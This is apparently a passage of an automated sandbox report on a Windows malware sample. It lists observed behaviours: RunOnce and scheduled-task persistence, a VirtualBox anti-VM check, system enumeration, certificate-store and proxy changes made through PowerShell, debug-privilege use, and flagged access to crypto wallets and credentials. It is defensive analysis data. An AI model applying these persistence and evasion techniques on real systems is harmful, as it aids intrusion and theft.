Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hf8Mh2Uh.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Lq5hq4TW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\FB38.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pG3rS0fl.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\60C1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6381.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
